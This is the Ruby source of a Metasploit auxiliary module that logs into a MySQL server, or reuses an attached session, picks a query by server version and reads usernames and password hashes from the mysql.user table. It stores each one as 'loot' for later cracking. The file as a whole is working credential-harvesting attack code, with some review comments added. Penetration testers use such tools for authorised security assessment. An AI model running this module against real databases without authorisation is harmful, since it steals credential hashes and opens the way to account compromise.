GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/scanner/mysql/mysql_hashdump.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
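class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::MYSQL
  include Msf::Auxiliary::Report
  include Msf::Auxiliary::Scanner
  include Msf::OptionalSession::MySQL

  def initialize
    super(
      'Name' => 'MYSQL Password Hashdump',
      'Description' => %(
        This module extracts the usernames and encrypted password
        hashes from a MySQL server and stores them for later cracking.
      ),
      'Author' => ['theLightCosine'],
      'License' => MSF_LICENSE
    )
  end

  # Scanner entry point, invoked once per target host.
  #
  # The connection comes either from an attached session or from a datastore
  # login (see #acquire_mysql_connection); the login used is recorded, then
  # the `mysql.user` table is read and each row stored as a hash credential.
  #
  # @param ip [String] target address handed over by the scanner mixin; the
  #   actual peer is taken from `mysql_conn` rather than from this value
  # @return [void]
  def run_host(ip)
    return unless acquire_mysql_connection

    report_service_login

    version = mysql_get_variable("@@version")
    if version.nil?
      print_error("There was an error reading the version")
      return
    end

    res = mysql_query(hash_query_for(version))
    if res.nil?
      print_error("There was an error reading the MySQL User Table")
      return
    end

    report_hashes(res)
  end

  private

  # Reuse an attached MySQL session when present, otherwise fall back to
  # logging in with the datastore credentials.
  #
  # @return [Boolean, Object] truthy when `mysql_conn` is usable afterwards
  def acquire_mysql_connection
    if session
      print_status("Using existing session #{session.sid}")
      self.mysql_conn = session.client
      return true
    end

    # otherwise fallback to attempting to login
    mysql_login_datastore
  end

  # Service fields shared by every credential and login record written for
  # the current connection.
  #
  # @param resolve [Boolean] when true, `peerhost` is passed through
  #   `Rex::Socket.getaddress` so the stored address is resolved
  # @return [Hash]
  def connection_service_data(resolve: false)
    host = mysql_conn.peerhost
    host = ::Rex::Socket.getaddress(host, true) if resolve
    {
      address: host,
      port: mysql_conn.peerport,
      service_name: 'mysql',
      protocol: 'tcp',
      workspace_id: myworkspace_id
    }
  end

  # Record the credential the module logged in with as a SUCCESSFUL login.
  #
  # NOTE(review): username/password are always read from the datastore, even
  # when an existing session was reused — confirm that is intended when the
  # session was opened with different credentials.
  #
  # @return [void]
  def report_service_login
    svc = connection_service_data
    credential_data = {
      module_fullname: self.fullname,
      origin_type: :service,
      private_data: datastore['PASSWORD'],
      private_type: :password,
      username: datastore['USERNAME']
    }.merge(svc)

    credential_core = create_credential(credential_data)

    login_data = {
      core: credential_core,
      last_attempted_at: DateTime.now,
      status: Metasploit::Model::Login::Status::SUCCESSFUL
    }.merge(svc)

    create_credential_login(login_data)
  end

  # Choose the `mysql.user` query matching the server's schema.
  #
  # Starting from MySQL 5.7, the 'password' column was changed to
  # 'authentication_string'.
  #
  # NOTE(review): only the first three characters of the version string are
  # compared, so any server reporting a non-MySQL-style version (e.g. a 10.x
  # fork) takes the authentication_string branch — confirm that column holds
  # the hash on such servers.
  #
  # @param version [String] raw value of `@@version`
  # @return [String] SQL statement
  def hash_query_for(version)
    if version[0..2].to_f > 5.6
      "SELECT user,authentication_string from mysql.user"
    else
      "SELECT user,password from mysql.user"
    end
  end

  # Store each returned (user, hash) row as a non-replayable hash credential
  # with an UNTRIED login against the service.
  #
  # @param res [#each, #size] query result whose rows expose `row[0]` (user)
  #   and `row[1]` (hash)
  # @return [void]
  def report_hashes(res)
    return unless res.size > 0

    svc = connection_service_data(resolve: true)
    credential_data = {
      origin_type: :service,
      jtr_format: 'mysql,mysql-sha1',
      module_fullname: self.fullname,
      private_type: :nonreplayable_hash
    }.merge(svc)

    res.each do |row|
      credential_data[:username] = row[0]
      credential_data[:private_data] = row[1]
      print_good("Saving HashString as Loot: #{row[0]}:#{row[1]}")
      credential_core = create_credential(credential_data)
      login_data = {
        core: credential_core,
        status: Metasploit::Model::Login::Status::UNTRIED
      }.merge(svc)
      create_credential_login(login_data)
    end
  end
end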